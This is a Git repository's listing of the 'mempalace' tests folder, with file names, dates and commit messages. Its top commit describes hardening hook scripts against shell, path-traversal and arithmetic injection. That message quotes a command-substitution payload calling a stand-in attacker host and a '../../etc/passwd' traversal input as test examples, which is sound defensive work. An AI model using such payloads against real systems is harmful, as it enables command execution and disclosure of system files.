mempalace/tests at 0f217f7c80531052dab71036886b5ab2d7356e01 - mempalace - GIT

jason/mempalace

Files

T

History

$BLUDATA\marcio.heiderscheidt$ BLUDATA\marcio.heiderscheidt 0f217f7c80 fix: harden hooks against shell injection, path traversal, and arithmetic injection

save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809

2026-04-14 07:54:42 -03:00

..

fix: format test_layers_bench.py with ruff to pass CI lint

2026-04-09 08:24:51 +03:00

conftest.py

Fix: ruff format with CI-pinned version (0.4.x)

2026-04-13 18:29:48 -04:00

test_backends.py

Fix: set cosine distance metadata on all collection creation sites

2026-04-13 11:00:52 -04:00

test_cli.py

refactor: route all chromadb access through ChromaBackend

2026-04-14 00:31:16 -03:00

test_closet_llm.py

merge: pr/closet-llm-generic + harden LLM regen path for production

2026-04-13 18:40:36 -03:00

test_closets.py

test: verify mine_lock via disjoint critical-section intervals

2026-04-13 19:08:57 -03:00

test_config_extra.py

test: bring coverage to 85%, set threshold to 85, reset version to 3.0.11

2026-04-08 21:38:12 +03:00

test_config.py

fix: allow Unicode in sanitize_name() — Latvian, CJK, Cyrillic (#637 ) (#683 )

2026-04-12 14:23:34 -07:00

test_convo_miner_unit.py

fix: store full AI response in convo_miner exchange chunking (#695 )

2026-04-12 14:23:52 -07:00

test_convo_miner.py

feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate

2026-04-13 16:20:55 -03:00

test_dedup.py

refactor: route all chromadb access through ChromaBackend

2026-04-14 00:31:16 -03:00

test_dialect.py

fix: align cmd_compress dict keys with compression_stats() return values (#569 )

2026-04-11 16:16:31 -07:00

test_entity_detector.py

test: bring coverage to 85%, set threshold to 85, reset version to 3.0.11

2026-04-08 21:38:12 +03:00

test_entity_registry.py

test: add comprehensive test coverage (35% → 58%, threshold 50%)

2026-04-08 20:54:56 +03:00

test_exporter.py

feat: new MCP tools — get/list/update drawer, hook settings, export (resolves #635 ) (#667 )

2026-04-11 21:25:04 -07:00

test_fact_checker.py

merge: full hardened stack + rewrite fact_checker around actual KG API

2026-04-13 18:20:11 -03:00

test_general_extractor.py

style: format test files with ruff

2026-04-08 21:08:49 +03:00

test_hall_detection.py

fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835 )

2026-04-13 17:11:11 -07:00

test_hooks_cli.py

fix: harden hooks against shell injection, path traversal, and arithmetic injection

2026-04-14 07:54:42 -03:00

test_hybrid_search.py

merge: pr/closet-llm-generic + harden LLM regen path for production

2026-04-13 18:40:36 -03:00

test_instructions_cli.py

test: add comprehensive test coverage (35% → 58%, threshold 50%)

2026-04-08 20:54:56 +03:00

test_knowledge_graph_extra.py

test: bring coverage to 85%, set threshold to 85, reset version to 3.0.11

2026-04-08 21:38:12 +03:00

test_knowledge_graph.py

fix: ruff format test_hooks_cli.py and test_knowledge_graph.py

2026-04-08 15:12:12 -03:00

test_layers.py

Мempalace backend seam (#413 )

2026-04-11 16:16:49 -07:00

test_mcp_server.py

Merge pull request #807 from sha2fiddy/fix/218-cosine-distance-metadata

2026-04-13 21:18:40 -03:00

test_migrate.py

chore: clarify security guardrails

2026-04-12 22:19:58 -03:00

test_miner.py

Merge pull request #807 from sha2fiddy/fix/218-cosine-distance-metadata

2026-04-13 21:18:40 -03:00

test_normalize.py

fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL

2026-04-13 16:11:03 -03:00

test_onboarding.py

test: bring coverage to 85%, set threshold to 85, reset version to 3.0.11

2026-04-08 21:38:12 +03:00

test_palace_graph.py

style: format test files with ruff

2026-04-08 21:08:49 +03:00

test_query_sanitizer.py

fix: make quote trimming explicit

2026-04-12 22:19:58 -03:00

test_readme_claims.py

fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835 )

2026-04-13 17:11:11 -07:00

test_repair.py

refactor: route all chromadb access through ChromaBackend

2026-04-14 00:31:16 -03:00

test_room_detector_local.py

fix: skip unreachable reparse points in detect_rooms_from_folders (#558 )

2026-04-11 16:16:06 -07:00

test_save_hook_mines.py

fix: save hook auto-mines transcript without MEMPAL_DIR (#840 )

2026-04-13 18:09:59 -07:00

test_searcher.py

Мempalace backend seam (#413 )

2026-04-11 16:16:49 -07:00

test_spellcheck_extra.py

test: bring coverage to 85%, set threshold to 85, reset version to 3.0.11

2026-04-08 21:38:12 +03:00

test_spellcheck.py

style: format test files with ruff

2026-04-08 21:08:49 +03:00

test_split_mega_files.py

test: expand coverage to 70%, fix mcp_server CI crash (threshold 60%)

2026-04-08 21:07:03 +03:00

test_version_consistency.py

fix: unify package and MCP version reporting

2026-04-07 08:53:25 +01:00